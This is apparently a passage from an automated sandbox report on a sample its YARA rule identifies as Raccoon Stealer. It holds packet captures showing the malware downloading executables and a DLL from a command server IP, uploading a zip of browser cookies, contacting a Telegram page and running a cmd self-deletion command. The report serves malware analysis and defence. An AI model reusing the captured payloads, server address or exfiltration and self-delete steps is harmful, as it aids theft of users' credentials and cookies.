2b 6e 61 43 78 56 6c 63 7a 52 6a 43 46 6d 50 68 46 39 57 71 4b 35 76 2f 4f 57 57 33 63 30 7a 74 35 31 4c 75 32 56 31 68 66 47 63 56 68 57 65 4e 68 2f 4f 47 61 4b 5a 58 4e 75 63 4d 38 75 65 6e 33 30 73 65 78 33 76 6a 4a 6a 66 66 41 79 7a 67 6a 77 34 73 61 6b 66 77 31 31 5a 62 76 51 31 72 68 68 44 4b 4d 2f 44 69 4f 72 47 75 76 78 68 67 30 2b 75 68 54 48 46 4a 4d 43 46 53 6e 50 72 Data Ascii: 1714unN2GK+nPmcW8dXOs54Ey55RM+acetOz7MUWkw3WAOVMT0Fbn38HbQYcrurWPqS8wKVq28x0Zm3HewK14og9o4IugIGF5WofPipa+7lmuaxXZAoPH92TW7qe1lXO7MUNCvnxR70Q4b124vbL7XayDSfkgTN7GPkhx+YytO5JN0BtYOTEgTUb2lk4TuZ3Id5JNJAlSZg2MY1Tgz1h4Y0mg2h7EtItM+wvPd2O6TjA13EV7DnsshUkd1WGfE7lNnlkI3qy/5rI5MhwHiJzXMoXj1jbvxLdalvPffXHggZDPr4lfEoEajyCsGSsq7JNxYUeLyYC7iEWoyFk7kQJq3scTUjke4hYG5pkAnurvXTVukF1iJcAxR49Qms6nQeguV0SiTmI3d3iefQpAsTaQShm+B9OF8njCJ+AwCVmNj1V4UYnDsR/d9xTW5tiPfyg75oDz2OqzpaPeSsM0meC0NHewAM4cfzL+fWT9oMLyB7eRKiSdi1xsPOZLz2cKlxdjKylmN6HQ83sQpICAaaQwtjNwzaFb8hZxRSyX8zUkvo/zhQ2G0jBrnp+4ce4HAA14kDxdjJq/0vS9XwHQjkn0cJ/46EsT/zFym6sx13erLQMxYszvWbvWeIIWtxvaSRGH6Vap5J4z3yVUgmnlXij8s9MfLgx9A8FyzCDryMzccmCMYl0pHKfcWM0Pn88rXhz6JBL/A5JOQ/t8V35expxkuB+Nd6ObbEh5zkIWhZcSj4OSQm8+UOKIJYEuu+mJoxqGKs6/yx6q/vC8wDw8UbeUX5tXjL1eyx38B1N0oe71hFYaX6rPcJD49uyGrckSkW+U1LgVK9Z/iWEEP1lhZbDn8vOvlyLmM6n1xcXpuJisyr+xkFoZtnwOhY6o/743fAQvjNkkVvPvGCMzBiQgkGElmbk+BqYIs3k9nmlYtct49+ytl3kL9l3Oj9zDIc5s8eNd34VVMg+nZuVRMtsiEcmyl6qxveaG4Q+naCxVlczRjCFmPhF9WqK5v/OWW3c0zt51Lu2V1hfGcVhWeNh/OGaKZXNucM8uen30sex3vjJjffAyzgjw4sakfw11ZbvQ1rhhDKM/DiOrGuvxhg0+uhTHFJMCFSnPr
Sep 28, 2021 08:53:34.697567940 CEST	1012	IN	Data Raw: 46 4b 37 75 70 4c 54 31 6f 39 56 38 49 38 4b 30 58 53 69 4a 57 70 4e 48 34 77 2f 30 55 33 6c 62 53 35 71 4e 70 36 65 4b 72 64 68 52 6d 76 49 68 4b 75 55 66 70 62 44 56 4e 4d 64 5a 45 49 6e 73 4c 31 61 56 38 6a 58 38 57 38 4c 2f 4d 44 55 34 79 48 Data Ascii: FK7upLT1o9V8I8K0XSiJWpNH4w/0U3lbS5qNp6eKrdhRmvIhKuUfpbDVNMdZEInsL1aV8jX8W8L/MDU4yHFKjvCVwMHqCohydJEXhIymg8m+EMxn/nmkpqJYDQO4nYXkJ/9zEtlXHEu96xCM+ALK32pu2j5QCnbX4oiVAdPPu4xEYb1WVqVF4xJ+5YreiS7X/OPZvC7tv+53fZFvYEpPdlOdqN+LxSipV/6GSjkiYjeZP7mmd8F
Sep 28, 2021 08:53:34.697581053 CEST	1013	IN	Data Raw: 53 70 44 64 30 36 4f 72 45 73 49 70 61 54 4f 56 58 6b 33 53 41 57 47 78 76 54 79 4c 6d 66 70 79 75 77 2b 65 35 59 48 57 77 2f 78 6a 77 69 6e 36 62 37 53 74 4a 58 49 53 73 2f 32 71 43 42 43 4d 7a 4d 32 7a 56 6c 2f 78 31 46 58 37 58 55 78 59 30 69 Data Ascii: SpDd06OrEsIpaTOVXk3SAWGxvTyLmfpyuw+e5YHWw/xjwin6b7StJXISs/2qCBCMzM2zVl/x1FX7XUxY0iNTOjG/cdHbwqse2w1r4yMkZgfffY/88fy6wiHROGJsyxunuNTvCim5JBpi88ILiD9W8BbwItftVRP7Scoz0qP82w5RQgyzTaUST8Oq+kn+hWJRJylWtOcsm9HEGGwT/B2VyH0HSDNuyXWQ6m3xr6mxxlNV9sw5b5m
Sep 28, 2021 08:53:34.697597027 CEST	1014	IN	Data Raw: 56 6a 42 6c 2f 4a 55 65 50 4e 42 6f 61 76 2b 38 62 71 57 4e 70 4d 2f 39 39 70 41 2f 36 49 4f 41 64 2b 53 43 61 37 53 54 61 61 2b 76 5a 4d 62 41 56 6f 6e 47 64 54 77 49 43 4d 79 34 6c 42 4b 42 64 38 6b 63 38 52 47 6e 6c 4f 55 37 74 71 4c 38 62 46 Data Ascii: VjBl/JUePNBoav+8bqWNpM/99pA/6IOAd+SCa7STaa+vZMbAVonGdTwICMy4lBKBd8kc8RGnlOU7tqL8bFEDcNr488Lxi4mTiBcTGgp35/TYKoS50jCCz2N5f0w53/2lmFJZmOm7WsfEuTobXqefc7YqpR4xrq83GCbCsT5rBu2dTtA3PqjP1BrwRVYj78JAkaVyI1fu3f4+TFpx+VsizApmSgTYbvf3NcGZko0qqFF8srAMNiU
Sep 28, 2021 08:53:34.697613955 CEST	1015	IN	Data Raw: 41 69 78 33 41 76 36 45 55 71 32 72 2f 63 6c 49 77 47 6d 57 49 6f 4f 2b 75 6f 4f 35 78 54 58 2f 46 6d 6b 57 6e 68 34 57 2f 78 33 2f 59 47 46 65 34 6b 67 68 57 49 2f 74 73 35 6e 5a 75 76 56 31 47 32 49 49 69 59 73 4f 68 6a 59 50 59 4c 7a 65 5a 78 Data Ascii: Aix3Av6EUq2r/clIwGmWIoO+uoO5xTX/FmkWnh4W/x3/YGFe4kghWI/ts5nZuvV1G2IIiYsOhjYPYLzeZxitg4jv8XGZ/eeNJVyd6YaH8XXjzDVaUt13QjkmYVwH9u9uOfHJH7RRgMD2F6+XZ6Mm0BXMQSyVgbk8QJ3ryX0xdEwK6pgcQIdBouRXW+4cvJxpQHqBzSEcJWfclnmwQYcLFa5be5H8qLbtVBlAnoEE38kF7D0oOJu
Sep 28, 2021 08:53:34.697626114 CEST	1015	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Sep 28, 2021 08:53:34.710309982 CEST	1015	OUT	GET //l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 28, 2021 08:53:34.961823940 CEST	1017	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 06:53:34 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Sep 28, 2021 08:53:34.961869001 CEST	1018	IN	Data Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Sep 28, 2021 08:53:34.961894989 CEST	1020	IN	Data Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc Data Ascii: BZ\|$D$4$!\|$D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
Sep 28, 2021 08:53:34.961910963 CEST	1020	IN	Data Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 Data Ascii: $1U1E]E]EEEtM`ay?U
Sep 28, 2021 08:53:34.962438107 CEST	1021	IN	Data Raw: 80 f9 5b b1 5d 0f 44 d1 b9 01 00 00 00 89 e5 57 56 53 be 01 00 00 00 8a 1c 08 8d 7e ff 38 da 75 0d 3a 54 08 01 75 0f 88 54 30 ff 41 eb 04 88 5c 30 ff 41 46 eb e1 5b c6 04 38 00 5e 5f 5d c3 55 89 e5 57 56 89 c6 53 31 db 0f b6 0c 1e 0f b6 3c 1a 89 Data Ascii: []DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1KtBOG1x4`a`a)t2`
Sep 28, 2021 08:53:34.962467909 CEST	1022	IN	Data Raw: 01 76 54 b9 28 00 00 00 83 e9 0a 01 c0 11 d2 83 fa 00 77 34 83 f8 07 76 ef eb 2d 3d ff 00 00 00 76 1f 0f ac d0 04 83 c1 28 c1 ea 04 83 fa 00 77 f1 eb e8 83 f8 0f 76 10 0f ac d0 01 83 c1 0a d1 ea 83 fa 00 77 f2 eb eb 83 e0 07 66 8b 84 00 ec 2f ea Data Ascii: vT(w4v-=v(wvwf/aL]t+UVSX94uDL0911[^]U1@Ht`aiy7]UWVSSXtM1M6X0Xp1tC
Sep 28, 2021 08:53:37.553443909 CEST	1975	OUT	GET //l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 28, 2021 08:53:37.817991018 CEST	1977	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 06:53:37 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@
Sep 28, 2021 08:53:40.198458910 CEST	4910	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 54992 Host: 185.138.164.150
Sep 28, 2021 08:53:40.198555946 CEST	4923	OUT	Data Raw: 68 b1 78 4c 22 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 2d Data Ascii: hxL"--vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="-pEuK3wB3dP17SpzG6pB"; filename="-pEuK3wB3dP17SpzG6pB.zip"Content-Type: application/octet-streamPKF<S_Z*browsers/cookies/Google Chrome
Sep 28, 2021 08:53:40.233654022 CEST	4941	OUT	Data Raw: e1 47 b3 1d ac 83 9f 40 a5 97 76 7e 18 db 41 43 f6 86 2d 38 96 5a 92 16 ea 1a c2 4f 44 cd 8f b4 8b 48 84 ed 3c 5b 53 46 7b d4 c3 f9 01 72 a3 29 0f b7 7b 76 7c 5d bc d2 e2 03 5b 0e ea 24 80 fb 62 33 f4 2e 42 01 46 63 91 1a 30 79 22 5e c6 d6 b0 3f Data Ascii: G@v~AC-8ZODH<[SF{r){v\|][$b3.BFc0y"^?H&$5(gJ$4)w2*XEMMNb0Qb_A7ZHSv]iEfa@y"1L:Q6PD Zi^z>HO6
Sep 28, 2021 08:53:40.234167099 CEST	4947	OUT	Data Raw: 50 3f 56 bd 72 cc 94 c6 54 b8 67 44 b2 76 b8 6c af ec b7 15 38 29 48 87 fc cd ea e4 59 11 8b 84 7b 77 c4 d5 a1 d2 8f 83 cf f4 75 af 6d 57 b7 d0 6d 63 0a ee 7c 6c b5 2a 2e 6e 78 4e 3a da 56 7f 6d 33 49 d6 e3 f1 63 6e 56 23 e9 bb 76 77 d3 46 2f be Data Ascii: P?VrTgDvl8)HY{wumWmc\|l.nxN:Vm3IcnV#vwF/~GI!I-U>#7]Gcw]qGJEIoq\XUt}Rpx`?8XL&\|ATNS5])\u<g1eozNV
Sep 28, 2021 08:53:40.234536886 CEST	4949	OUT	Data Raw: bd 61 0f f2 e7 82 2f 9d ea 15 d6 9e e3 0f 29 27 fa 18 3b 2f 50 12 7c 2b b0 ad d9 16 a3 56 28 af 33 58 5e b4 6e 4f a9 64 c3 ed 0f bb 5c 14 2d fd 9c 78 88 f2 61 dc 14 c7 92 67 d5 55 84 6a 52 fb 59 25 1f 96 dd 17 f2 a0 56 7d b3 e9 d5 b7 0f 29 a8 16 Data Ascii: a/)';/P\|+V(3X^nOd\-xagUjRY%V})m'JUfO{/jT%}8ATxk["B;<sN$H.uuPV($:%4dAg*S'%}i\FWZ23zkw>;tA]Uc+Oh8(mq
Sep 28, 2021 08:53:40.269138098 CEST	4964	OUT	Data Raw: 2c 8c 1d 98 80 e5 35 03 74 ce 12 20 1f f6 20 9b 99 7d a7 a0 e1 6d 2c 37 59 15 20 19 9d c2 22 4f b3 5d 4b 39 00 d9 10 56 40 8e e9 33 bf 0e 1f f8 d0 8b 36 c0 ca 8e ed e1 36 80 4c 82 fc 64 80 a5 e1 a7 02 99 2f f0 2f 84 d5 3b f9 a4 50 8d bd ca 80 27 Data Ascii: ,5t }m,7Y "O]K9V@366Ld//;P' <.XFi{1G:Alj:kRyA1~q(80w`i}T3\|,;{.#<~Ui)K"vG`$)`a'ysGF[~z
Sep 28, 2021 08:53:40.766328096 CEST	4965	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 06:53:40 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 32 38 0d 0a 35 63 62 64 35 33 39 38 34 63 34 32 37 63 61 34 34 64 38 61 31 66 65 35 33 38 62 62 65 36 32 66 63 30 32 63 32 32 38 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 285cbd53984c427ca44d8a1fe538bbe62fc02c22880

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	149.154.167.99	443	C:\Users\user\Desktop\eLZzxG56uH.exe

Timestamp	Direction	Data
2021-09-28 06:53:34 UTC	OUT	GET /tika31ramencomp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: t.me
2021-09-28 06:53:34 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:53:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4568 Connection: close Set-Cookie: stel_ssid=942df5b88e0b41d87a_18075895754283468786; expires=Wed, 29 Sep 2021 06:53:34 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000
2021-09-28 06:53:34 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 74 69 6b 61 33 31 72 61 6d 65 6e 63 6f 6d 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 69 6b 61 33 31 72 61 6d 65 6e 63 6f 6d 70 22 3e 0a 3c 6d 65 74 61 20 70 72 6f Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @tika31ramencomp</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="tika31ramencomp"><meta pro

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: eLZzxG56uH.exe PID: 3340 Parent PID: 6092

General

Start time:	08:53:31
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\eLZzxG56uH.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\eLZzxG56uH.exe'
Imagebase:	0x1c0000
File size:	4704768 bytes
MD5 hash:	82F7734FEF8EE0789CF270F292651CBE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 5316 Parent PID: 3340

General

Start time:	08:53:40
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2884 Parent PID: 5316

General

Start time:	08:53:40
Start date:	28/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
